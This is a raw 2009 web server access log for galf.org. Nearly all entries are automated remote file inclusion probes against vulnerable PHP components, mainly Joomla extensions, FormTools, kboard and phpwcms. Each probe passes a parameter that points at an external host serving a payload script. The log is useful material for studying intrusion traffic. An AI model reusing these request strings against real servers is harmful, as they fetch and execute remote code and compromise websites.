87.118.116.55 - - [07/Sep/2009:06:51:12 -0700] "GET /logs/access_090202.log%20%20////////?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:51:19 -0700] "GET /logs/access_090622.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:51:19 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:51:19 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:51:32 -0700] "GET /logs/access_090622.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:51:32 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:06:51:33 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.91 - - [07/Sep/2009:06:52:07 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
207.58.163.86 - - [07/Sep/2009:06:52:34 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [07/Sep/2009:06:52:34 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [07/Sep/2009:06:52:34 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [07/Sep/2009:06:52:42 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [07/Sep/2009:06:52:42 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
207.58.163.86 - - [07/Sep/2009:06:52:42 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.30.79.96 - - [07/Sep/2009:06:53:23 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
218.38.136.251 - - [07/Sep/2009:06:56:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:06:56:20 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:06:56:31 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:06:56:31 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:06:56:51 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
94.136.37.141 - - [07/Sep/2009:06:57:05 -0700] "GET /logs/access.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:57:05 -0700] "GET /?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:57:05 -0700] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:06:57:14 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
94.136.37.141 - - [07/Sep/2009:06:57:28 -0700] "GET /logs/access.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:57:28 -0700] "GET /?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:06:57:28 -0700] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:06:58:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.98.252.56 - - [07/Sep/2009:07:00:49 -0700] "GET /logs/access_090720.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.98.252.56 - - [07/Sep/2009:07:00:49 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.98.252.56 - - [07/Sep/2009:07:00:49 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:00:55 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:00:55 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:00:55 -0700] "GET /logs/access_090209.log%20%20/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.86 - - [07/Sep/2009:07:01:04 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Sep/2009:07:01:11 -0700] "GET /FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:07:01:11 -0700] "GET /logs/access_090330.log%20%20//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:07:01:16 -0700] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.98.252.56 - - [07/Sep/2009:07:01:23 -0700] "GET /logs/access_090316.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:07:01:27 -0700] "GET /FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:07:01:42 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:07:01:43 -0700] "GET /logs/access_090330.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:07:01:45 -0700] "GET /logs/access_090302.log%20%20//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:07:01:50 -0700] "GET /logs/access_090302.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:07:02:00 -0700] "GET /logs/access.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:07:02:00 -0700] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:07:02:00 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
207.58.163.86 - - [07/Sep/2009:07:02:16 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.146.177.61 - - [07/Sep/2009:07:02:18 -0700] "GET /logs/access.log HTTP/1.1" 200 361036 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:07:02:31 -0700] "GET /logs/access_090119.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:02:39 -0700] "GET /community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:02:39 -0700] "GET /logs/access_090209.log%20%20/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:02:39 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:07:02:46 -0700] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:07:02:46 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:07:02:46 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:07:04:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:07:04:40 -0700] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:07:04:40 -0700] "GET /logs/access.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
202.146.177.61 - - [07/Sep/2009:07:05:01 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
174.143.3.188 - - [07/Sep/2009:07:05:03 -0700] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
174.143.3.188 - - [07/Sep/2009:07:05:03 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
174.143.3.188 - - [07/Sep/2009:07:05:04 -0700] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
174.143.3.188 - - [07/Sep/2009:07:05:04 -0700] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:07:05:45 -0700] "GET /logs/access.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:07:05:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:07:05:46 -0700] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:07:07:14 -0700] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:07:07:14 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:07:07:15 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.27.203.107 - - [07/Sep/2009:07:07:30 -0700] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [07/Sep/2009:07:07:30 -0700] "GET /logs/access_090209.log%20%20/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:07:08:25 -0700] "GET /logs/access.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:07:08:25 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
218.38.136.251 - - [07/Sep/2009:07:08:26 -0700] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
81.24.35.80 - - [07/Sep/2009:07:08:55 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:07:08:55 -0700] "GET /logs/access_090706.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:07:08:55 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:09:00 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:09:00 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:09:00 -0700] "GET /logs/access_090223.log//classes/adodbt/sql.php?classes_dir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:07:09:56 -0700] "GET /logs/access_090504.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:10:09 -0700] "GET /logs/access_090316.log//classes/adodbt/sql.php?classes_dir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
94.75.245.36 - - [07/Sep/2009:07:10:38 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.75.245.36 - - [07/Sep/2009:07:10:38 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.75.245.36 - - [07/Sep/2009:07:10:38 -0700] "GET /logs/access.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://beep-beep.ru/scripts/x? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [07/Sep/2009:07:10:41 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
94.75.245.36 - - [07/Sep/2009:07:12:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
94.75.245.36 - - [07/Sep/2009:07:12:04 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
94.75.245.36 - - [07/Sep/2009:07:12:04 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
222.122.72.216 - - [07/Sep/2009:07:12:46 -0700] "GET /mygallerybrowser.php?myPath=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:12:46 -0700] "GET /logs/mygallerybrowser.php?myPath=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:12:46 -0700] "GET /logs/access_090601.log%20%20/mygallerybrowser.php?myPath=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [07/Sep/2009:07:13:03 -0700] "GET /logs/access.log//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [07/Sep/2009:07:13:03 -0700] "GET /toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [07/Sep/2009:07:13:03 -0700] "GET /logs//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.65.20.79 - - [07/Sep/2009:07:13:13 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:13:14 -0700] "GET /logs/access_090720.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:13:14 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:13:14 -0700] "GET /logs/access_090309.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:13:38 -0700] "GET /logs/access_090615.log%20%20/mygallerybrowser.php?myPath=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [07/Sep/2009:07:13:48 -0700] "GET /logs/access.log//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [07/Sep/2009:07:13:48 -0700] "GET /toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.212.175.154 - - [07/Sep/2009:07:13:48 -0700] "GET /logs//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
80.67.26.96 - - [07/Sep/2009:07:13:49 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
